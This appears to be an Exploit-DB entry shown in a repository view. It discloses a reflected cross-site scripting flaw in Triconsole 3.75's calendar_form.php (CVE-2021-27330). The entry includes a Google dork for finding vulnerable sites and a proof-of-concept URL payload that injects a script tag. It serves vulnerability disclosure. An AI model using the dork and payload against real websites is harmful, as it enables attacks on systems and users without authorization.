b9c4ec0226
4 changes to exploits/shellcodes Remote Desktop Web Access - Authentication Timing Attack (Metasploit Module) Simple Employee Records System 1.0 - File Upload RCE (Unauthenticated) Triconsole 3.75 - Reflected XSS LightCMS 1.3.4 - 'exclusive' Stored XSS
11 lines
No EOL
442 B
Text
11 lines
No EOL
442 B
Text
# Exploit Title: Triconsole 3.75 - Reflected XSS
|
|
# Google Dork: inurl : /calendar/calendar_form.php
|
|
# Date: 15/2/2021
|
|
# Exploit Author: Akash Chathoth
|
|
# Vendor Homepage: http://www.triconsole.com/
|
|
# Software Link: http://www.triconsole.com/php/calendar_datepicker.php
|
|
# Version: < 3.76 (14 February 2021)
|
|
# Tested on: 3.75
|
|
# CVE: 2021-27330
|
|
|
|
# Exploit : http://exapmle.com/calendar_form.php/"><script>alert(document.domain)</script> |